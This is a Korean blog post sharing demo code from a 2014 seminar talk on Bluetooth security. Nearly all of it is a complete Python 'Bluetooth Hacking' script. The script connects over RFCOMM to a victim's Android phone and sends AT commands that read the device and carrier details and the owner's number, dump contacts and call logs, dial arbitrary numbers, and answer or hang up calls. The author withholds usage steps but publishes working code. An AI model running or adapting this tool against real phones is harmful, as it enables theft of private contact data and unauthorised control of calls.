bluetooth를 이용한 안드로이드폰 제어

2014년 1월에 처음으로 열린 경남권 세미나에서 발표한 "Bluetooth Security"의 Demo코드를 공개하겠습니다.

블루투스를 공부하면서 스마트폰을 제어할 수 있는 코드를 작성해봤는데요.

구조는 아주 간단하니 다 보이실거에요^^

※악용의 소지가 될 수 있으므로 사용법은 공개하지 않겠습니다.

(질문 환영입니다~!! 물론 태클도 환영해요. 점프연습 많이 해둘게요 ㅋㅋ 다 피해버리겠어 +_+)

Atcommand : 전화단말기나 블루투스를 제어하기 위한 명령어(현재 버전이 오르면서 막힌 명령어도 많음)

# Infomation

1. Language : Python 2.7.6

2. OS : Kali Linux (It's not virtual machine)

3. Smartphone : Samsung Galaxy S3 LTE (SHV-210S)

4. Bluetooth version

- Attacker : 4.0

- Victim : 4.0

#!/usr/bin/python
#-*-coding:utf8-*-
import bluetooth
import sys

class Hack:
    def __init__(self):
        self.phoneSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
        print '\n\n [*] Choose the number..'
        print '   [1] Get the target info'
        print '   [2] Phonebook List'
        print '   [3] Dialing'
        #print '   [4] Re Dialing'
        print '   [4] Disconnect Call'
        print '   [5] Get call'
        print '   [q] Quit'

    def getInfo(self, target, port):
        try:
            print " [+] Getting the victim information..."
            self.phoneSock.connect((target, port))
            print " [+] Information "
            self.phoneSock.send("at+cops?\r\n")#Tel company
            print " [=] Telecom : " + self.phoneSock.recv(1024).split(' ')[1].split('\"')[1]
            self.phoneSock.send("at+cgmi\r\n") #Dev company
            print " [=] Company : " + self.phoneSock.recv(1024).split(' ')[1].split('\r\n')[0]
            self.phoneSock.send("at+cgmm\r\n") #Dev model
            print " [=] Dev Model : " + self.phoneSock.recv(1024).split(' ')[1].split('\r\n')[0]
            self.phoneSock.send("at+cnum\r\n") #phone number
            print " [=] Phone number : " + self.phoneSock.recv(1024).split('\"')[1]

        except Exception, e:
            print e

    def getPhonebook(self, target, port):
        try:
            print " [+] Getting the book list..."
            self.phoneSock.connect((target, port))
            atCmd = "AT+CPBS=?\r\n"
            self.phoneSock.send(atCmd)
            print " [+] Selet the mode :: " + self.phoneSock.recv(1024)[2:-4]  # ("ME","SM","DC","RC","MC")
            print ' [+] ME : 저장된 번호'
            print ' [+] SM : '
            print ' [+] DC : 발신전화'
            print ' [+] RC : 수신전화'
            print ' [+] MC : 부재중전화'
            mode = raw_input(" > ")                # Input the mode that result of "AT+CPBS=?"
            atCmd = "AT+CPBS=" + mode + "\r\n"
            self.phoneSock.send(atCmd)
            print self.phoneSock.recv(1024)
            print " [+] How many gets phone number?"
            num = raw_input(" > ")
            for contact in range(int(num)):
                atCmd = 'AT+CPBR=' + str(contact+1) + '\r\n'
                self.phoneSock.send(atCmd)
                result = self.phoneSock.recv(1024).split('\"')
                print ' [%d] %s : %s ' %(contact+1, result[3], result[1])
        except Exception, e:
            print '[-]', e

    def DialingOut(self, target, port):
        try:
            print '[+] Connecting the target...'
            self.phoneSock.connect((target, port))
            print '[+] Input the phone number'
            num = raw_input(" > ")
            atCmd = 'ATD ' + num + '\r\n'    #voice call
            print '[+] Dialing...'
            self.phoneSock.send(atCmd)
            self.phoneSock.recv(1024)
        except Exception, e:
            print '[-]', e
    '''
    def ReDial(self, target, port):
        try:
            print '[+] Connection the target...'
            self.phoneSock.connect((target, port))
            self.phoneSock.send('AT+CPBS=DC\r\n')
            self.phoneSock.recv(1024)
            self.phoneSock.send('AT+CPBR=1\r\n')
            num = self.phoneSock.recv(1024).split('\"')[1]
            print '[+] Re Dialling...'
            self.phoneSock.send("ATD" + num + "\r\n")
            self.phoneSock.recv(1024)
        except Exception, e:
            print '[-]', e
    '''
    def DisconnectCall(self, target, port):
        try:
            print '[+] Connecting the target...'
            self.phoneSock.connect((target, port))
            print '[+] Disconnect.'
            self.phoneSock.send('AT+CHUP\r\n')
            self.phoneSock.recv(1024)
        except Exception, e:
            print '[-]', e
    def GetDial(self, target, port):
        try:
            print '[+] Connecting the target...'
            self.phoneSock.connect((target, port))
            print '[+] Get dialing...'
            self.phoneSock.send('ata\r\n')
            self.phoneSock.recv(1024)
        except Exception, e:
            print '[-]', e
    def __del__(self):
        self.phoneSock.close()

def logo():
    print "###############################"
    print "#                             #"
    print "#   Bluetooth Hacking         #"
    print "#                             #"
    print "#             by blackcon :D  #"
    print "###############################"


def main():
    if len(sys.argv) < 3:
        print ' Usage : %s [target] [port]' %sys.argv[0]
        exit(1)
    logo()
    target = sys.argv[1]
    port = int(sys.argv[2])
    while (1):
        c = Hack()
        sel = raw_input(" >> ")
        print ''
        if sel == "1":        c.getInfo(target, port)
        elif sel == "2":    c.getPhonebook(target, port)
        elif sel == "3":    c.DialingOut(target, port)
        #elif sel == "4":    c.ReDial(target, port)
        elif sel == "4":    c.DisconnectCall(target, port)
        elif sel == "5":    c.GetDial(target, port)
        elif sel == 'q':    break
        else:    "[-] Input error. Try again :D "
        c.__del__()
    print " Bye ~!! :D"
if __name__ == "__main__":
    main()